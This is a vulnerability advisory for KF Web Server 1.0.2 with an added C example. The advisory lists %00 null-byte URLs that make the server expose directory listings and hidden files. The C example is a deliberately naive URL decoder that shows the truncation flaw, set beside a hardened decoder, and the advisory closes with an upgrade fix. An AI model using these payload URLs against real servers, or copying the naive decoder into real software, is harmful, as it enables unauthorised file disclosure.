8th Jul 2002 [SBWID-5515]
COMMAND
KF Web Server shows file and directory content
SYSTEMS AFFECTED
KF Web Server version 1.0.2
PROBLEM
Thanks to Arnaud Jacques aka scrap [webmaster@securiteinfo.com]
[http://www.securiteinfo.com] for the following message:
If the requested URL contains a %00 after a directory name, then the
server shows the full content of that directory. A hacker can see all
hidden (non-HTML-linked) files and directories on the server.
.oO Exploit Oo.
The exploit is really easy. You can do it with any browser. Examples:
http://server_name/index.html : Normal use.
http://server_name/%00 : You get the vulnerability.
http://server_name/index.html%00 : Is *not* vulnerable.
http://server_name/%00index.html : You get the vulnerability. In fact everything after %00 is ignored.
http://server_name/subdir/%00 : You get the vulnerability.
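The advisory does not publish KF Web Server's internals, so the following is an added example (not the server's code and not part of Arnaud's message) that models the generic failure class behind "everything after %00 is ignored": a C percent-decoder that writes the raw byte for %00 into a NUL-terminated buffer, so every strlen/strcmp/open-style call downstream sees only the prefix, next to a strict decoder that rejects the request instead. The function names url_decode_naive and url_decode_strict and the sample paths fed to main() are assumptions of this example; the paths are the ones listed above.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Value of one hex digit, or -1 if c is not a hex digit (NUL included). */
static int hexval(unsigned char c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = (unsigned char)tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Naive decoder (the vulnerable pattern): translates every %XX escape
 * into its raw byte, so "%00" becomes a real NUL inside the buffer.
 * Returns the number of bytes written, which can exceed strlen(out)
 * once a NUL has been embedded; anything after that NUL is invisible
 * to strlen/strcmp/fopen-style callers, i.e. "ignored" by the server. */
size_t url_decode_naive(const char *in, char *out, size_t outsz) {
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < outsz; i++) {
        unsigned char c = (unsigned char)in[i];
        /* hexval() of a NUL is -1, so in[i + 2] is only read when in[i + 1] is a hex digit */
        if (c == '%' && hexval((unsigned char)in[i + 1]) >= 0
                     && hexval((unsigned char)in[i + 2]) >= 0) {
            c = (unsigned char)(hexval((unsigned char)in[i + 1]) * 16
                              + hexval((unsigned char)in[i + 2]));
            i += 2;
        }
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return o;
}

/* Hardened decoder: refuses any request that decodes to a NUL byte or
 * carries a malformed escape, before the path ever reaches the filesystem.
 * Returns 0 on success, -1 on rejection (out is then not meaningful). */
int url_decode_strict(const char *in, char *out, size_t outsz) {
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        int c = (unsigned char)in[i];
        if (c == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = (hi >= 0) ? hexval((unsigned char)in[i + 2]) : -1;
            if (hi < 0 || lo < 0) return -1;   /* malformed escape */
            c = hi * 16 + lo;
            if (c == 0) return -1;             /* embedded NUL: reject the request */
            i += 2;
        }
        if (o + 1 >= outsz) return -1;         /* would overflow out */
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 0;
}

int main(void) {
    /* The URL paths from the advisory (constructed input for this example). */
    const char *paths[] = { "/index.html", "/%00", "/index.html%00",
                            "/%00index.html", "/subdir/%00" };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++) {
        char seen[128], clean[128];
        size_t wrote = url_decode_naive(paths[i], seen, sizeof seen);
        int ok = url_decode_strict(paths[i], clean, sizeof clean);
        printf("%-16s naive: server sees \"%s\" (%zu of %zu decoded bytes)  strict: %s\n",
               paths[i], seen, strlen(seen), wrote, ok == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```

Run as written, the naive decoder turns "/%00index.html" and "/subdir/%00" into "/" and "/subdir/" respectively (a directory, with no file name left to serve), while "/index.html%00" still truncates to "/index.html", which matches the three cases listed in the message. The fix in the strict decoder is to reject %00 at decode time rather than trying to sanitize the path afterwards, since by then the C string has already lost everything after the NUL.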
SOLUTION
Upgrade to KF Web Server version 1.0.3
http://www.keyfocus.net/kfws/download/